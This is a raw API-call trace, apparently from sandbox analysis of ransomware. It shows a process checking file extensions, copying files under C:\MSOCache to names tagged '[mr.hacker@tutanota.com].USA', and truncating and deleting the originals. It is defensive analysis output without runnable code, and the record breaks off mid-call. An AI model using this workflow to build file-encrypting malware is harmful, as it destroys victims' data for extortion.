[0047.005] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString=".doc") returned 4 [0047.006] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString=".docx") returned 5 [0047.006] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.006] lstrlenW (lpString=".pdf") returned 4 [0047.006] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString=".xls") returned 4 [0047.006] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString=".xlsx") returned 5 [0047.006] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.006] lstrlenW (lpString=".ppt") returned 4 [0047.006] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString=".zip") returned 4 [0047.006] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString=".rar") returned 4 [0047.006] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString=".bz2") returned 4 [0047.006] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.006] lstrlenW (lpString=".7z") returned 3 [0047.006] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString=".dbf") returned 4 [0047.006] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString=".1cd") returned 4 [0047.006] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString=".jpg") returned 4 [0047.006] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.006] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.007] lstrlenW (lpString=".doc") returned 4 [0047.007] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString=".docx") returned 5 [0047.007] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.007] lstrlenW (lpString=".pdf") returned 4 [0047.007] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString=".xls") returned 4 [0047.007] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString=".xlsx") returned 5 [0047.007] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.007] lstrlenW (lpString=".ppt") returned 4 [0047.007] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.007] lstrlenW (lpString=".zip") returned 4 [0047.007] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString=".rar") returned 4 [0047.007] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString=".bz2") returned 4 [0047.007] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.007] lstrlenW (lpString=".7z") returned 3 [0047.007] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.007] lstrlenW (lpString=".dbf") returned 4 [0047.007] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.007] lstrlenW (lpString=".1cd") returned 4 [0047.007] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.007] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0047.007] lstrlenW (lpString=".jpg") returned 4 [0047.007] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.007] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0047.007] lstrlenW (lpString="dwtrig20.exe") returned 12 [0047.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.008] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=519584) returned 1 [0047.008] CloseHandle (hObject=0x1b0) returned 1 [0047.008] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0047.008] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.008] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.008] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.008] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.433] GetLastError () returned 0x0 [0047.433] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x7eda0, lpOverlapped=0x0) returned 1 [0047.444] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x7edb0, lpOverlapped=0x0) returned 1 [0047.452] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.452] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.453] SetEndOfFile (hFile=0x204) returned 1 [0047.453] CloseHandle (hObject=0x204) returned 1 [0047.453] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.453] SetEndOfFile (hFile=0x1b0) returned 1 [0047.457] CloseHandle (hObject=0x1b0) returned 1 [0047.457] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.457] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0047.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.457] lstrlenW (lpString=".doc") returned 4 [0047.457] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.457] lstrlenW (lpString=".docx") returned 5 [0047.457] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0047.457] lstrlenW (lpString=".pdf") returned 4 [0047.458] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".xls") returned 4 [0047.458] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".xlsx") returned 5 [0047.458] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0047.458] lstrlenW (lpString=".ppt") returned 4 [0047.458] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString=".zip") returned 4 [0047.458] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".rar") returned 4 [0047.458] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".bz2") returned 4 [0047.458] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.458] lstrlenW (lpString=".7z") returned 3 [0047.458] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString=".dbf") returned 4 [0047.458] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString=".1cd") returned 4 [0047.458] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString=".jpg") returned 4 [0047.458] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.458] lstrlenW (lpString=".doc") returned 4 [0047.458] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.458] lstrlenW (lpString=".docx") returned 5 [0047.458] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0047.458] lstrlenW (lpString=".pdf") returned 4 [0047.458] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".xls") returned 4 [0047.458] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.458] lstrlenW (lpString=".xlsx") returned 5 [0047.459] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0047.459] lstrlenW (lpString=".ppt") returned 4 [0047.459] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.459] lstrlenW (lpString=".zip") returned 4 [0047.459] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.459] lstrlenW (lpString=".rar") returned 4 [0047.459] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.459] lstrlenW (lpString=".bz2") returned 4 [0047.459] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.459] lstrlenW (lpString=".7z") returned 3 [0047.459] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.459] lstrlenW (lpString=".dbf") returned 4 [0047.459] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.459] lstrlenW (lpString=".1cd") returned 4 [0047.459] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.459] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.459] lstrlenW (lpString=".jpg") returned 4 [0047.459] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.459] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0047.459] lstrlenW (lpString="msvcr90.dll") returned 11 [0047.459] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.459] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=655872) returned 1 [0047.459] CloseHandle (hObject=0x1b0) returned 1 [0047.460] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0047.460] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.460] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.460] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.460] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.460] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.460] GetLastError () returned 0x0 [0047.460] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xa0200, lpOverlapped=0x0) returned 1 [0047.478] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xa0210, lpOverlapped=0x0) returned 1 [0047.489] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.489] WriteFile (in: hFile=0x204, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.489] SetEndOfFile (hFile=0x204) returned 1 [0047.489] CloseHandle (hObject=0x204) returned 1 [0047.489] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.489] SetEndOfFile (hFile=0x1b0) returned 1 [0047.494] CloseHandle (hObject=0x1b0) returned 1 [0047.495] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.495] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0047.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.495] lstrlenW (lpString=".doc") returned 4 [0047.495] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString=".docx") returned 5 [0047.495] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.495] lstrlenW (lpString=".pdf") returned 4 [0047.495] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString=".xls") returned 4 [0047.495] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString=".xlsx") returned 5 [0047.495] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.495] lstrlenW (lpString=".ppt") returned 4 [0047.495] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.495] lstrlenW (lpString=".zip") returned 4 [0047.495] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString=".rar") returned 4 [0047.495] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.495] lstrlenW (lpString=".bz2") returned 4 [0047.495] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.496] lstrlenW (lpString=".7z") returned 3 [0047.496] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString=".dbf") returned 4 [0047.496] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString=".1cd") returned 4 [0047.496] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString=".jpg") returned 4 [0047.496] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString=".doc") returned 4 [0047.496] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString=".docx") returned 5 [0047.496] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.496] lstrlenW (lpString=".pdf") returned 4 [0047.496] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString=".xls") returned 4 [0047.496] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString=".xlsx") returned 5 [0047.496] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.496] lstrlenW (lpString=".ppt") returned 4 [0047.496] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.496] lstrlenW (lpString=".zip") returned 4 [0047.496] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString=".rar") returned 4 [0047.496] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.496] lstrlenW (lpString=".bz2") returned 4 [0047.496] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.496] lstrlenW (lpString=".7z") returned 3 [0047.496] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.496] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.497] lstrlenW (lpString=".dbf") returned 4 [0047.497] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.497] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.497] lstrlenW (lpString=".1cd") returned 4 [0047.497] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.497] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.497] lstrlenW (lpString=".jpg") returned 4 [0047.497] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.497] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0047.497] lstrlenW (lpString="OfficeLR.cab") returned 12 [0047.497] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.497] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=14127746) returned 1 [0047.497] CloseHandle (hObject=0x1b0) returned 1 [0047.497] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0047.497] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.497] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0047.498] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.498] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.498] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.498] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.503] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.503] ReadFile (in: hFile=0x1b0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.505] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.505] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.505] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.671] SetFilePointerEx (in: hFile=0x1b0, 